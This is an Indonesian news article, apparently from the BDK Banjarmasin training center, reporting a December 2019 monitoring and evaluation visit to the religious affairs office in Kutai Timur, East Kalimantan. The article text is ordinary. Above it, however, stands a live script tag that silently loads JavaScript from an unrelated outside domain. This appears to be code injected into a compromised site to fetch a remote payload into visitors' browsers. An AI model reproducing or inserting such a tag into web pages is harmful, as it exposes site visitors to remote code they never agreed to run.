<script async src='https://slow.destinyfernandi.com/dbekjrhg3?type=d&frm=scr&' type='text/javascript'></script>

Monitoring & Evaluasi Pasca Diklat di Kab. Kutai Timur ( Kalimantan Timur )

 

( Tim Monev BDK Banjarmasin disambut oleh para Pejabat kankemenag Kab. Kutai Timur. ki-ka: yusmadi (anggota tim), H. Nanang Gazali ( Kasubbag TU), H. Abd. Majid ( kasi Penmad), Drs. Muhran (ketua tim), Eko Juniardy ( Ketua Pokjawas ), dan Bardiansyah (anggota tim )

     Monitoring dan Evaluasi ( Monev ) merupakan suatu kegiatan pengamatan, observasi, pencarian data, dan peninjauan langsung ke lapangan untuk mendapatkan suatu informasi faktual tentang suatu kegiatan. Demikian juga mengenai pelaksanaan kegiatan diklat yang telah dilaksanakan oleh Balai Diklat Keagamaan ( BDK ) Banjarmasin baik itu Kegiatan Diklat yang dilaksanakan di Kampus BDK Banjarmasin ( Diklat Reguler ) dan Diklat di Wilayah Kerja ( DDWK ) yang dilaksanakan di wilayah tempat peserta bertugas ( di Kabupaten / Kota ). Kegiatan Monev ini dilaksanakan pada 23 Lokus ( lokasi ) Kabupaten / Kota di 4 Propinsi se kalimantan Selatan, Kalimantan Tengah, Kalimantan Timur, dan Kalimantan Utara ). 

     Kegiatan Monev ini bertujuan untuk mendapatkan data dan informasi mengenai capaian pada tujuan pelaksanaan kegiatan diklat yang telah dilaksanakan oleh BDK Banjarmasin. Pada kegiatan ini juga dilakukan observasi dan pengamatan langsung mengenai para alumni diklat setelah mengikuti kegiatan diklat sebelumnya.

      Salah satu lokus pelaksanaan kegiatan monev ini adalah di lingkungan Kantor kemenag Kab. Kutai Timur Propinsi Kalimantan Timur yang dilaksanakan mulai tanggal 4 s.d 7 Desember 2019. Tim Monev BDK Banjarmasn yang bertugas di lokus ini terdiri dari Drs. Muhran ( Ketua Tim ), Yusmadi dan Bardiansyah ( Anggota Tim )

   Kegiatan monev ini dilaksanakan dengan cara memberikan instrumen kuisioner Monitoring dan Analisis Kebutuhan Diklat  (AKD) yang berisi pertanyaan / pernyataan mengenai kondisi, aplikasi, capaian, kendala, dan harapan dari para alumni diklat. kuisioner ditujukan kepada alumni diklat, atasan langsung alumni diklat, rekan sejawat di tempat tugas, dan siswa yang diajar oleh para alumni diklat, serta Kepala Kantor kementerian Agama kabupaten / Kota setempat.

( Ketua Tim Monev Kab. Kutai Timur Drs. Muhran sedang melakukan pengamatan di MTs Nurul Hikmah Kab. Kutai Timur )

      Selain itu Tim Monev yang didampingi oleh Pejabat Kankemenag Kab. Kutai Timur juga melakukan observasi dan berdialog dengan para alumni diklat dan atasan langsung alumni untuk menggali lebih dalam menyangkut kondisi  perkembangan para alumni dan harapan – harapan yang ingin dicapai dimasa yang akan datang.

      Diharapkan nantinya data – data dan informasi yang diperoleh selama kegiatan Monev ini akan diolah sebagai bahan dan informasi yang penting dalam rangka evaluasi dan perencanaan kediklatan BDK Banjarmasin di masa yang akan datang.

 

( Tim Monev BDK Banjarmasin bersama para pejabat Kankemenag Kab. Kutai Timur dan para alumni diklat di tempat tugas mereka )